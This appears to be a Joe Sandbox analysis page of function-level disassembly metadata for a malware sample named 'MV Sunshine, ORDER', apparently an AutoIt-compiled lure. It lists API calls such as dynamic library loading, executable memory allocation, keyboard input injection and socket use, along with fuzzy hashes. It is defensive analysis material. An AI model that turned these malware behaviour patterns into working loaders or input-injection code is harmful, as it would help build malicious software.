Function 00984D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984D2E,?,00984F4F,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984D81

Strings

kernel32.dll, xrefs: 00984D6A
Wow64DisableWow64FsRedirection, xrefs: 00984D7B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: b34bab289af28493e3c5bee31d5766b0c9744fa228a64d02300d5fbc1c301f5e
Instruction ID: 240b0e5238667cd24ea9af1b118bdef560eba148cbc7d42d5514097c094be282
Opcode Fuzzy Hash: b34bab289af28493e3c5bee31d5766b0c9744fa228a64d02300d5fbc1c301f5e
Instruction Fuzzy Hash: 92D01770510717DFDB30AF71D808616B6E8BF16352B118D3AA886E6A90E670E881CB51

Function 00A01072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A012C1), ref: 00A01080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A01092

Strings

RegDeleteKeyExW, xrefs: 00A0108C
advapi32.dll, xrefs: 00A0107B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 6a84e041c0cf76688a805c65f44aaf02a33e65812acb9d39c4c05d01e272c2c6
Instruction ID: 309d0485a04ffccc5bb8605f2ca92981d0b32eae261f5269dee0cc78acdb26d8
Opcode Fuzzy Hash: 6a84e041c0cf76688a805c65f44aaf02a33e65812acb9d39c4c05d01e272c2c6
Instruction Fuzzy Hash: 2FD01230510716DFD7309FB5E81859776E5AF05351F118E3AB9C9DA590E770C8C1C650

Function 009F93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F9009,?,00A0F910), ref: 009F9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9415

Strings

kernel32.dll, xrefs: 009F93FE
GetModuleHandleExW, xrefs: 009F940F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: cd30ce1365460f06de6dbedd34d3f571ca7e37888b096f7d2b7397bf719b3bf7
Instruction ID: 37800b608e9334c00a6d205d758d728581a8174f78726bfb7249da22e6ead656
Opcode Fuzzy Hash: cd30ce1365460f06de6dbedd34d3f571ca7e37888b096f7d2b7397bf719b3bf7
Instruction Fuzzy Hash: F2D0C73050872BDFCB318FB1D90820272E8BF25342B00CC3AA682E29A0E670C8C2CB50

Function 009C1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009C1B42
__swprintf.LIBCMT ref: 009C1B73

Strings

%.3d, xrefs: 009C1B4D
WIN_XPe, xrefs: 009C1BB2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 0d18d0d9672e6fc231220eaa5c4cc8a17f34d8e178e60704222285427e18f343
Instruction ID: 8226c632f4ac8f9a21877b09f4d3a5e1d5865ab4de0519788763407b4eda2ad9
Opcode Fuzzy Hash: 0d18d0d9672e6fc231220eaa5c4cc8a17f34d8e178e60704222285427e18f343
Instruction Fuzzy Hash: 47D012B1C04118EACB14AA90CC44EF9737CA719301F100D96B506A1445F23C9F859F2A

Function 009D76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
Instruction ID: 490c586e2d0aa3e3ae720ca9f5198c9544cc339e93501e47d160306671d9b382
Opcode Fuzzy Hash: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
Instruction Fuzzy Hash: 13C16C75A4421AEFCB14CF94C884AAEF7B9FF48710B11899AE805EB351E730DD81DB90

Function 009FE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 009FE3D2
CharLowerBuffW.USER32(?,?), ref: 009FE415

Part of subcall function 009FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009FE615
_memmove.LIBCMT ref: 009FE628

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 54aeb54088c85ce84cc7999c7135b6e02f7b782b13773437e600bd95cac1f36b
Instruction ID: 631b087171d4fe6a3829a8f3da9829ceb05279e6897695f0fbfa37b97c128b81
Opcode Fuzzy Hash: 54aeb54088c85ce84cc7999c7135b6e02f7b782b13773437e600bd95cac1f36b
Instruction Fuzzy Hash: D7C159716083059FC714DF28C480A6ABBE4FF89718F14896EF9999B361D731E946CB82

Function 009F83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009F83D8
CoUninitialize.OLE32 ref: 009F83E3

Part of subcall function 009DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DDAC5

VariantInit.OLEAUT32(?), ref: 009F83EE
VariantClear.OLEAUT32(?), ref: 009F86BF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 6cae1b474088308ef30a4d88cae85845e81522aec6bb2ac8ce2d2b46474558b4
Instruction ID: 4db79862775e8f4cf01689935a925eb70f1f2a6d7c525690ed883b6879d2117d
Opcode Fuzzy Hash: 6cae1b474088308ef30a4d88cae85845e81522aec6bb2ac8ce2d2b46474558b4
Instruction Fuzzy Hash: EAA15C752047059FDB50EF58C885B2AB7E4BF88314F18884DFA9A9B3A1CB35ED05CB42

Function 009D7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C4A
CLSIDFromProgID.OLE32(?,?,00000000,00A0FB80,000000FF,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7C6F
_memcmp.LIBCMT ref: 009D7C90

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 24eecb569dde944e4749a66d0c2da55c4b0c866d9c638d6318f21ac37cb7f4b0
Instruction ID: d51172332ea2277634de6d3ecbae26894add1cf0433d5e9c7e5f10d6a83c01ae
Opcode Fuzzy Hash: 24eecb569dde944e4749a66d0c2da55c4b0c866d9c638d6318f21ac37cb7f4b0
Instruction Fuzzy Hash: 6A810C75A00109EFCB04DFE4C984EEEB7B9FF89315F208599E505AB250DB71AE06CB60

Function 009D6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D6E04
SysAllocString.OLEAUT32(00000000), ref: 009D6EAD
VariantCopy.OLEAUT32 ref: 009D6EDC
VariantClear.OLEAUT32(?), ref: 009D6F03

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 813ea0f52e7775a0dfc9a1bf810c8a9e9ef01a170c44e54daa21dfd9aec90caf
Instruction ID: 7cb87bda7f3c526c8ef8278619fa2eef987f28df265d62505516a60adb019356
Opcode Fuzzy Hash: 813ea0f52e7775a0dfc9a1bf810c8a9e9ef01a170c44e54daa21dfd9aec90caf
Instruction Fuzzy Hash: 5651CB306887019EDB20AFA9D891B39F3E9AF45310F24CC1FE956DB3D1EB7498409B51

Function 00A09A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015C1D40,?), ref: 00A09AD2
ScreenToClient.USER32(00000002,00000002), ref: 00A09B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A09B72

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5dbe64719db244f05e251d47150b0a986ee2588abb59da9558136376dc572a67
Instruction ID: 4afbd64ed00e04406bcc1257e6b157e3401d7ecb3408909a7e3fdd7551c2961e
Opcode Fuzzy Hash: 5dbe64719db244f05e251d47150b0a986ee2588abb59da9558136376dc572a67
Instruction Fuzzy Hash: B7512D34A00209EFCF20DF68E980AAE7BB5FB56360F108159F8159B2D1D731AD82CB90

Function 009F6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009F6CE4
WSAGetLastError.WSOCK32(00000000), ref: 009F6CF4

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009F6D58
WSAGetLastError.WSOCK32(00000000), ref: 009F6D64

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 20710d36a07bf093ad38b79157c678688084028b7f63ce48f0a815406815464b
Instruction ID: de01a78f4f7a050ac233d12102e2df16d0d3b6786736016cb399d7e6a5ba95ae
Opcode Fuzzy Hash: 20710d36a07bf093ad38b79157c678688084028b7f63ce48f0a815406815464b
Instruction Fuzzy Hash: ED418275740204AFEB20BF64DC86F3A77A99B84B10F448418FA5AAB3D3DA759D018791

Function 009F672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A0F910), ref: 009F67BA
_strlen.LIBCMT ref: 009F67EC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a429c43dfb6ec8edc7ed5e2a2bdeb7e886e51bb3d7c0e98f87aeb4173162a61e
Instruction ID: 4f6367db9f8e3edf7f392bcd8b8c4dc68d4609512d3e21dff432bcfce3af9523
Opcode Fuzzy Hash: a429c43dfb6ec8edc7ed5e2a2bdeb7e886e51bb3d7c0e98f87aeb4173162a61e
Instruction Fuzzy Hash: 2A41B535A00208AFCB14FBA4DCD5FBEB7A9AF85354F148169F91AA7392DB30AD05C750

Function 009EBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009EBB09
GetLastError.KERNEL32(?,00000000), ref: 009EBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009EBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009EBB80

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: f1800205ae49b9134e209995ca897113d820e97b6e65a1e2be7a66a7948f4a1f
Instruction ID: c4b79caf088dd062f2dd241b9dc3ce7e3efced1415ae74140754ebd36e4ea246
Opcode Fuzzy Hash: f1800205ae49b9134e209995ca897113d820e97b6e65a1e2be7a66a7948f4a1f
Instruction Fuzzy Hash: 1C411D39200650DFCF11EF59C585A6DBBE5EF89310B198498EC4A9B762CB35FD02CB91

Function 00A08AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A08B4D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: e10a40d190e19f779a8fa4f579f261fe8a1e66309f34b2597976c87de91f78bc
Instruction ID: 86bcd472f3f728772aa69926c1e9c89dd8d186bdc153d65e1675dbba42b937aa
Opcode Fuzzy Hash: e10a40d190e19f779a8fa4f579f261fe8a1e66309f34b2597976c87de91f78bc
Instruction Fuzzy Hash: 2C31E1B460020CBFEB209B58EC95FAD3BA4EB07350F244512FA91D62E0CE39A9418759

Function 00A0ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A0AE1A
GetWindowRect.USER32(?,?), ref: 00A0AE90
PtInRect.USER32(?,?,00A0C304), ref: 00A0AEA0
MessageBeep.USER32(00000000), ref: 00A0AF11

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f424482c7fc42ed133814cd19b0495d931cd0b124d7226c13f4dfe7eae668cc2
Instruction ID: 992f52ddaa27cffb7cd309925b121677d5d09d51e94bd0eba2c0ca7043e59b09
Opcode Fuzzy Hash: f424482c7fc42ed133814cd19b0495d931cd0b124d7226c13f4dfe7eae668cc2
Instruction Fuzzy Hash: B441807460032DDFCB11CF98E884B997BF5FF99740F2481A9E4149B291D731A842CF92

Function 009E0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009E1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 009E1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009E10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009E110B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
Instruction ID: 2b08e152b3092f07bb049bc5df60e7f64d19acae71f7e5423581989665c31744
Opcode Fuzzy Hash: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
Instruction Fuzzy Hash: 08317830E446C8AEFF32CB678C05BFABBADAB84322F08421AE590521D0C3798DC58751

Function 009E1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009E1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 009E1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 009E11F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009E1243

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
Instruction ID: 72eb5dfd4d5a86a1b002aa1cd2ba893349e095f46f08fd5c656d69b28a4b0c7b
Opcode Fuzzy Hash: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
Instruction Fuzzy Hash: 2E314830A4428C5EEF36CAA78C047FA7BAEAB89310F04431AE691926D1C3785D958751

Function 009B6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B644B
__isleadbyte_l.LIBCMT ref: 009B6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B64DD

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 387fcd7487023b9d00dffd920d45c0099bed09e0989906dad70ff297fd7f1ba0
Instruction ID: 96294e307f387e0e6a016f03514f1e7b91101cbfc9cdab9f583daa029d4cb032
Opcode Fuzzy Hash: 387fcd7487023b9d00dffd920d45c0099bed09e0989906dad70ff297fd7f1ba0
